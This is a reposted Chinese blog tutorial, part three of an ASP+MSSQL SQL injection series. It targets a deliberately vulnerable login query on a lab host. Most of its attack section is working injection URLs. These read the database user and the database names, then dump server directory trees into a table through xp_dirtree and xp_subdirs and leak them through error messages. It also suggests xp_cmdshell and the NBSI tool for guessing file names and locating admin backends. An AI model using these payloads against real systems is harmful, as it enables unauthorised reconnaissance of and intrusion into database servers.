ASP+MSSQL系列注射教程之三。暴目录及文件列表。

转载 2006年05月18日 14:51:00

 

使用的程序仍然是系列注射教程之一的漏洞程序,漏洞语句:
sql2="select * from bbsuser where username='admin' and password='"&request("password")&"'"


http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>user_name()-- 看数据库权限
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>db_name()--   当前数据库名
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)----得其它数据库名

一、暴目录的第一种方法
xp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree 'c:/'
返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段

http://192.168.0.9:3005/test/f.asp?password=888888' create table dirs(paths varchar(100), id int)--
http://192.168.0.9:3005/test/f.asp?password=888888' insert dirs exec master.dbo.xp_dirtree 'c:/'--
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select top 1 paths from dirs)--
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select top 1 paths from dirs where paths not in('winnt'))--
http://192.168.0.9:3005/test/f.asp?password=888888' and 0<>(select top 1 paths from dirs where paths not in('winnt','system32'))--
这种方法发现暴目录是将所有目录包括子目录都暴出来,像winnt下有很多子目录全部暴出来,不实用,一个一个查要累死。结合下面的方法只暴目录

二、暴目录的第二种方法
必须是sa权限才可以用xp_subdirs对像
http://192.168.0.9:3005/test/f.asp?password=88'create table temp(id nvarchar(255));--
http://192.168.0.9:3005/test/f.asp?password=88'insert into temp(id) exec master.dbo.xp_subdirs 'c:/';--
http://192.168.0.9:3005/test/f.asp?password=88' and 0<>(select top 1 id from temp)--

三、
不过你们想到了没有,可以将目录树写在表里然后用NBSI暴出表值。就可以得到全部目录列表。可以用来猜到管理后台目录。然后再用
exec master.dbo.xp_dirtree 'c:/查到的目录名'就可以猜文件名了。当然,你结合exec master.dbo.xp_cmdshell 'dir 目录'也可以猜出文件名。

相关文章推荐

[unreal4入门系列之三] 初探UE4安装文件目录结构

UE4文件夹里面包含了许多有用的资源,我们首先去了解这些文件结构,以便日后需要用到的时候随时地查找我们所需要的东西。 打开UE4所安装的目录,你会看到我们下载好的4.10版本的文件夹。 ...

Android 多渠道打包之混淆文件ProGuard技术详解-特别篇(打包系列教程之三)

通过前两篇的学习,我们对android打包流程有了基本的认识,本来这篇内容是准备分析ant的android多渠道打包过程,但是在测试案例的时候,发现还有一个比较重要的知识点没介绍-ProGuard技术...

用ASP,FSO显示当前根目录下所有文件,目录列表的方法

用ASP,FSO显示当前根目录下所有文件,目录列表的方法 const_domain_name为域名最后不要加斜杠const const_domain_name="http://192.168.29.1...

用ASP,FSO显示当前根目录下所有文件,目录列表的方法

b,img,a{font-size:9pt;line-height:150%;text-decoration:none;color:#0000cc;} span{font-size:12pt;} <...

bootstrap系列之三列表与代码样式

效果一 中国 美国 英国 中国 美国 英国 中国 美...
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)